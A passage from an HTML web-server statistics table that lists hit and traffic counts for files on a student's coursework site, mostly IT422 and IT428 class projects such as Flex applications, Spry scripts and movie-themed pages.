SIZE="-2">0.16%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>162</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.13%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/Flex/DogYears.swf">/ClassWork/IT428/Flex/DogYears.swf</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>36</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.14%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/DrunkenHome.html">/ClassWork/IT422/FinalProject/DrunkenHome.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>37</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.12%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>178</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.15%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/Flex/YahooSearch2.swf">/ClassWork/IT428/Flex/YahooSearch2.swf</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>38</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/CastDrunken.html">/ClassWork/IT422/FinalProject/CastDrunken.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>39</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/CastHustle.html">/ClassWork/IT422/FinalProject/CastHustle.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>40</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/CastKiss.html">/ClassWork/IT422/FinalProject/CastKiss.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>41</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/CastOngBak.html">/ClassWork/IT422/FinalProject/CastOngBak.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>42</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/FearlessHome.html">/ClassWork/IT422/FinalProject/FearlessHome.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>43</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/HustleHome.html">/ClassWork/IT422/FinalProject/HustleHome.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>44</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/Subscribe.html">/ClassWork/IT422/FinalProject/Subscribe.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>45</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/thanks.html">/ClassWork/IT422/FinalProject/thanks.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>46</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/Elastic/">/ClassWork/IT422/Elastic/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>47</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/CastFearless.html">/ClassWork/IT422/FinalProject/CastFearless.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>48</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/ImagesDrunk.html">/ClassWork/IT422/FinalProject/ImagesDrunk.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>49</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/ImagesHustle.html">/ClassWork/IT422/FinalProject/ImagesHustle.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>50</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/ImagesKiss.html">/ClassWork/IT422/FinalProject/ImagesKiss.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>51</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/KissHome.html">/ClassWork/IT422/FinalProject/KissHome.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>52</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>41</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.03%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/MenuSpryAssets/SpryMenuBar.js">/ClassWork/IT422/FinalProject/MenuSpryAssets/SpryMenuBar.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>53</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/MenuSpryAssets/SpryMenuBarHorizontal.css">/ClassWork/IT422/FinalProject/MenuSpryAssets/SpryMenuBarHorizontal.css</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>54</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/OngBakHome.html">/ClassWork/IT422/FinalProject/OngBakHome.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>55</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>41</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.03%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/Scripts/swfobject_modified.js">/ClassWork/IT422/FinalProject/Scripts/swfobject_modified.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>56</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>222</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.18%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/SpryAssets/SpryData.js">/ClassWork/IT422/FinalProject/SpryAssets/SpryData.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>57</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>123</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/SpryAssets/xpath.js">/ClassWork/IT422/FinalProject/SpryAssets/xpath.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>58</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/css/CastCss.css">/ClassWork/IT422/FinalProject/css/CastCss.css</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>59</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>222</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.18%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/rolloverSpryAssets/SpryData.js">/ClassWork/IT422/FinalProject/rolloverSpryAssets/SpryData.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>60</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/rolloverSpryAssets/SpryMasterDetail.css">/ClassWork/IT422/FinalProject/rolloverSpryAssets/SpryMasterDetail.css</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>61</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>123</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/rolloverSpryAssets/xpath.js">/ClassWork/IT422/FinalProject/rolloverSpryAssets/xpath.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>62</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>236</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.19%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/Flex/ChartPresentation.swf">/ClassWork/IT428/Flex/ChartPresentation.swf</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>63</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1042</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.85%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/johnnyedick.com_sitemap.xml">/johnnyedick.com_sitemap.xml</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>64</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/DrunkenMasterII.xml">/ClassWork/IT422/FinalProject/DrunkenMasterII.xml</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>65</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/ImagesDrunken.xml">/ClassWork/IT422/FinalProject/ImagesDrunken.xml</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>66</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/ImagesFearless.html">/ClassWork/IT422/FinalProject/ImagesFearless.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>67</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/ImagesHustle.xml">/ClassWork/IT422/FinalProject/ImagesHustle.xml</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>68</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/ImagesOngBak.html">/ClassWork/IT422/FinalProject/ImagesOngBak.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>69</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/Kiss.xml">/ClassWork/IT422/FinalProject/Kiss.xml</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>70</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/Ongbak.xml">/ClassWork/IT422/FinalProject/Ongbak.xml</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>71</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/Apollo11/">/ClassWork/IT422/Apollo11/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>72</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/Elastic/KDrama.html">/ClassWork/IT422/Elastic/KDrama.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>73</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/CastSpryAssets/SpryMasterDetail.css">/ClassWork/IT422/FinalProject/CastSpryAssets/SpryMasterDetail.css</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>74</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>87</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.07%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/CastSpryAssets/xpath.js">/ClassWork/IT422/FinalProject/CastSpryAssets/xpath.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>75</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/ImagesKiss.xml">/ClassWork/IT422/FinalProject/ImagesKiss.xml</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>76</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/ImagesOngBak.xml">/ClassWork/IT422/FinalProject/ImagesOngBak.xml</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>77</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/Progress/Progress.xml">/ClassWork/IT422/FinalProject/Progress/Progress.xml</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>78</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/SpryAssets/SpryValidationSelect.css">/ClassWork/IT422/FinalProject/SpryAssets/SpryValidationSelect.css</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>79</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/SpryAssets/SpryValidationSelect.js">/ClassWork/IT422/FinalProject/SpryAssets/SpryValidationSelect.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>80</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/SpryAssets/SpryValidationTextField.css">/ClassWork/IT422/FinalProject/SpryAssets/SpryValidationTextField.css</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>81</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>91</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.07%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/SpryAssets/SpryValidationTextField.js">/ClassWork/IT422/FinalProject/SpryAssets/SpryValidationTextField.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>82</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>47</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/Flex/ShirtSales.swf">/ClassWork/IT428/Flex/ShirtSales.swf</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>83</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/">/ClassWork/IT422/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>84</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/Apollo11/crew.html">/ClassWork/IT422/Apollo11/crew.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>85</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left 